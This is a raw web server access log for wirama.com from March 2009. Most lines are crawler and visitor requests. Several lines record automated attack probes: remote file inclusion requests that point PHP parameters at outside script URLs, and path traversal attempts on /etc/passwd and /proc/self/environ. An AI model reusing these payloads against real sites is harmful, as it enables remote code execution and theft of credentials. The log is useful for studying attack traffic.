219.94.174.158 - - [04/Mar/2009:23:18:50 -0800] "GET /errors.php?error=http://www.kefalonitis.com/images/boing?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "wirama.com"
219.94.174.158 - - [04/Mar/2009:23:18:50 -0800] "GET /logs/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
219.94.174.158 - - [04/Mar/2009:23:18:50 -0800] "GET /add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
219.94.174.158 - - [04/Mar/2009:23:18:51 -0800] "GET /logs/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
219.94.174.158 - - [04/Mar/2009:23:18:51 -0800] "GET /add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "wirama.com"
65.55.208.61 - - [04/Mar/2009:23:22:24 -0800] "GET /logs/?D=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.61 - - [04/Mar/2009:23:34:14 -0800] "GET /logs/?M=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
202.169.237.106 - - [04/Mar/2009:23:48:28 -0800] "GET / HTTP/1.0" 200 900 "http://www.google.com/custom?hl=en&client=pub-7289618462157806&channel=2067284334&cof=FORID%3A1%3BGL%3A1%3BS%3Ahttp%3A%2F%2Fwww.vista-inspirat.net%2Fen%2F%3BL%3Ahttp%3A%2F%2Fwww.vista-inspirat.net%2Flogo-google.jpg%3BLH%3A50%3BLW%3A249%3BLBGC%3AFFFFFF%3BLC%3A%230066cc%3BVLC%3A%23940f04%3BGALT%3A%232D8930%3BGFNT%3A%2332527a%3BGIMP%3A%2332527a%3BDIV%3A%23336699%3B&ie=ISO-8859-1&oe=ISO-8859-1&q=WIRAMA&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5" "www.wirama.com"
72.30.65.34 - - [05/Mar/2009:00:12:10 -0800] "GET /_private/form_results.csv HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.208.62 - - [05/Mar/2009:00:34:59 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [05/Mar/2009:00:34:59 -0800] "GET /logs/?S=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
212.100.253.201 - - [05/Mar/2009:00:40:50 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.100.253.201 - - [05/Mar/2009:00:40:50 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.100.253.201 - - [05/Mar/2009:00:40:50 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.100.253.201 - - [05/Mar/2009:00:42:23 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.100.253.201 - - [05/Mar/2009:00:42:23 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
212.100.253.201 - - [05/Mar/2009:00:42:23 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.55.208.59 - - [05/Mar/2009:02:28:48 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.59 - - [05/Mar/2009:02:28:49 -0800] "GET /tmp/?S=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.232.11 - - [05/Mar/2009:04:52:27 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
65.55.232.11 - - [05/Mar/2009:04:52:27 -0800] "GET / HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.wirama.com"
207.58.136.166 - - [05/Mar/2009:05:26:58 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thenakedtruckerandt-bones.com/reads.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
207.58.136.166 - - [05/Mar/2009:05:26:58 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.thenakedtruckerandt-bones.com/reads.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
65.55.208.60 - - [05/Mar/2009:05:46:43 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [05/Mar/2009:05:46:44 -0800] "GET /tmp/?M=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.53 - - [05/Mar/2009:06:40:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.53 - - [05/Mar/2009:06:40:21 -0800] "GET /_private/ HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
83.167.62.163 - - [05/Mar/2009:07:55:03 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
83.167.62.163 - - [05/Mar/2009:07:55:03 -0800] "GET /contents.htm HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
114.111.36.26 - - [05/Mar/2009:08:08:51 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" "www.wirama.com"
114.111.36.26 - - [05/Mar/2009:08:09:07 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/customer_webtxt_02.jsp)" "www.wirama.com"
72.30.65.34 - - [05/Mar/2009:08:44:13 -0800] "GET /?M=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
72.30.65.34 - - [05/Mar/2009:08:54:01 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
83.167.62.163 - - [05/Mar/2009:08:54:34 -0800] "GET /text/wirama_reader_white_paper.pdf HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "wirama.com"
208.36.144.8 - - [05/Mar/2009:09:03:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.wirama.com"
66.235.112.5 - - [05/Mar/2009:09:37:47 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
66.235.112.5 - - [05/Mar/2009:09:37:47 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
89.113.221.213 - - [05/Mar/2009:10:17:11 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "wirama.com"
89.113.221.213 - - [05/Mar/2009:10:17:11 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "wirama.com"
78.151.161.24 - - [05/Mar/2009:10:30:48 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
78.151.161.24 - - [05/Mar/2009:10:30:48 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
78.151.161.24 - - [05/Mar/2009:10:31:46 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
78.151.161.24 - - [05/Mar/2009:10:31:57 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
65.168.203.3 - - [05/Mar/2009:11:18:46 -0800] "GET / HTTP/1.1" 200 916 "http://www.rfidjournalevents.com/live2008/companyPopUpbce5.html?companyID=365" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "wirama.com"
65.168.203.3 - - [05/Mar/2009:11:18:46 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "wirama.com"
65.168.203.3 - - [05/Mar/2009:11:18:55 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "wirama.com"
65.168.203.3 - - [05/Mar/2009:11:19:01 -0800] "GET /logs/ HTTP/1.1" 200 1230 "http://wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "wirama.com"
65.168.203.3 - - [05/Mar/2009:11:19:29 -0800] "GET /files/series_A.pdf HTTP/1.1" 404 275 "http://venturebeat.com/2007/02/28/wirama-wireless-rfid-co-raises-first-round-of-funding/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "www.wirama.com"
65.168.203.3 - - [05/Mar/2009:11:19:29 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "wirama.com"
65.168.203.3 - - [05/Mar/2009:11:19:30 -0800] "GET / HTTP/1.1" 200 916 "http://venturebeat.com/2007/02/28/wirama-wireless-rfid-co-raises-first-round-of-funding/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19" "www.wirama.com"
65.55.208.48 - - [05/Mar/2009:11:25:35 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [05/Mar/2009:11:25:39 -0800] "GET /logs/?N=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [05/Mar/2009:11:25:53 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [05/Mar/2009:11:25:53 -0800] "GET /tmp/?N=D HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.27.42.19 - - [05/Mar/2009:12:11:18 -0800] "GET / HTTP/1.1" 200 916 "http://www.google.com.jm/search?hl=en&ei=2jGwSbfgKuGNmQfkl8nOBQ&sa=X&oi=spell&resnum=1&ct=result&cd=1&q=wirama.com&spell=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "www.wirama.com"
72.27.42.19 - - [05/Mar/2009:12:11:19 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "wirama.com"
65.55.208.59 - - [05/Mar/2009:14:06:12 -0800] "GET /text/Wirama_Reader_white_paper.pdf HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.80.195.41 - - [05/Mar/2009:15:13:20 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Tablet PC 2.0)" "wirama.com"
65.55.208.60 - - [05/Mar/2009:15:37:52 -0800] "GET /tmp/?M=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.65.34 - - [05/Mar/2009:15:43:16 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.208.47 - - [05/Mar/2009:16:30:08 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.47 - - [05/Mar/2009:16:30:09 -0800] "GET /_private/?D=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
212.139.95.217 - - [05/Mar/2009:16:41:57 -0800] "GET / HTTP/1.1" 200 916 "http://www.google.co.uk/search?q=+wirama&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 3P_UVRM/1.0.17.0 Firefox/2.0.0.20" "www.wirama.com"
208.78.59.186 - - [05/Mar/2009:17:30:37 -0800] "GET /logs/access_081231.log HTTP/1.1" 200 303093 "http://ca.search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=m3&vf=txt&vm=p&fl=1&fr=yfp-t-501&p=%40yahoo.com+%40hotmail.com+OR+%40gmail.com+OR+%40msn+%22csv%22+-industry%2Fcompany+-%2Ffactory&vs=.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.wirama.com"
208.78.59.186 - - [05/Mar/2009:17:30:39 -0800] "GET /logs/access.log HTTP/1.1" 200 162884 "http://ca.search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=m3&vf=txt&vm=p&fl=1&fr=yfp-t-501&p=%40yahoo.com+%40hotmail.com+OR+%40gmail.com+OR+%40msn+%22csv%22+-industry%2Fcompany+-%2Ffactory&vs=.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.wirama.com"
208.78.59.186 - - [05/Mar/2009:17:31:13 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "wirama.com"
208.78.59.186 - - [05/Mar/2009:17:32:19 -0800] "GET /logs/access_090201.log HTTP/1.1" 200 475690 "http://ca.search.yahoo.com/search?n=100&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vd=m3&vf=txt&vm=p&fl=1&fr=yfp-t-501&p=%40yahoo.com+%40hotmail.com+OR+%40gmail.com+OR+%40msn+%22csv%22+-industry%2Fcompany+-%2Ffactory&vs=.com" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.wirama.com"
77.88.27.25 - - [05/Mar/2009:17:42:55 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
77.88.27.25 - - [05/Mar/2009:17:42:56 -0800] "GET / HTTP/1.1" 200 916 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
65.55.208.47 - - [05/Mar/2009:18:16:50 -0800] "GET /logs/?N=A HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [05/Mar/2009:20:29:09 -0800] "GET /tmp/?N=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.65.34 - - [05/Mar/2009:20:32:28 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
208.80.195.35 - - [05/Mar/2009:21:21:13 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; OptusIE55-31; FunWebProducts)" "www.wirama.com"
212.43.17.1 - - [05/Mar/2009:22:35:53 -0800] "GET /logs/access_090101.log HTTP/1.1" 200 7270 "http://www.google.com.kw/search?q=http%3A%2F%2Fwww.google.com%2Fsearch%3Fclient%3Dfirefox-a%26rls%3Dorg.mozilla%253Aen-US%253Aofficial%26channel%3Ds%26hl%3Den%26q&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:ar:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.wirama.com"
212.43.17.1 - - [05/Mar/2009:22:35:56 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "wirama.com"
212.43.17.1 - - [05/Mar/2009:22:35:59 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ar; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "wirama.com"
65.55.208.60 - - [06/Mar/2009:00:30:20 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [06/Mar/2009:00:30:20 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [06/Mar/2009:01:28:05 -0800] "GET /_private/?N=D HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
208.80.195.47 - - [06/Mar/2009:04:50:50 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {15077763-B0D0-BE9C-6AB5-C3B263699DD4})" "www.wirama.com"
65.55.208.50 - - [06/Mar/2009:06:01:46 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.50 - - [06/Mar/2009:06:01:48 -0800] "GET /_private/?S=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [06/Mar/2009:06:23:07 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.62 - - [06/Mar/2009:06:23:09 -0800] "GET /?S=A HTTP/1.1" 200 916 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
38.99.13.121 - - [06/Mar/2009:06:27:41 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "wirama.com"
66.235.124.32 - - [06/Mar/2009:06:45:19 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
66.235.124.32 - - [06/Mar/2009:06:45:19 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.wirama.com"
208.111.154.29 - - [06/Mar/2009:07:53:30 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.wirama.com"
208.111.154.29 - - [06/Mar/2009:07:53:30 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.wirama.com"
65.55.208.62 - - [06/Mar/2009:08:14:12 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
72.30.65.34 - - [06/Mar/2009:11:05:36 -0800] "GET /jo01.htm HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
64.32.224.241 - - [06/Mar/2009:11:57:49 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
64.32.224.241 - - [06/Mar/2009:11:57:50 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
64.32.224.241 - - [06/Mar/2009:11:57:52 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
64.32.224.241 - - [06/Mar/2009:11:57:53 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7" "wirama.com"
216.14.80.169 - - [06/Mar/2009:13:23:46 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "wirama.com"
216.14.80.169 - - [06/Mar/2009:13:23:46 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "wirama.com"
216.14.80.169 - - [06/Mar/2009:13:23:46 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "wirama.com"
66.7.212.241 - - [06/Mar/2009:13:25:53 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
66.7.212.241 - - [06/Mar/2009:13:25:53 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
66.7.212.241 - - [06/Mar/2009:13:25:53 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://thepopculturestore.com/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "wirama.com"
201.117.66.150 - - [06/Mar/2009:13:41:19 -0800] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gospelkoor-intouch.nl/site/modules/cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.117.66.150 - - [06/Mar/2009:13:41:19 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gospelkoor-intouch.nl/site/modules/cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
201.117.66.150 - - [06/Mar/2009:13:41:19 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://gospelkoor-intouch.nl/site/modules/cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
72.30.65.34 - - [06/Mar/2009:14:59:09 -0800] "GET /_private/ HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.55.208.48 - - [06/Mar/2009:15:32:24 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.48 - - [06/Mar/2009:15:32:25 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
65.55.208.60 - - [06/Mar/2009:18:29:43 -0800] "GET /logs/?D=D HTTP/1.1" 200 1230 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "wirama.com"
66.179.175.12 - - [06/Mar/2009:19:22:08 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
66.179.175.12 - - [06/Mar/2009:19:22:08 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
66.179.175.12 - - [06/Mar/2009:19:22:08 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "wirama.com"
72.30.65.34 - - [06/Mar/2009:19:25:31 -0800] "GET /?S=A HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
65.254.51.178 - - [06/Mar/2009:20:02:42 -0800] "GET /logs/access.log/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "wirama.com"
65.254.51.178 - - [06/Mar/2009:20:02:42 -0800] "GET /logs/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "wirama.com"
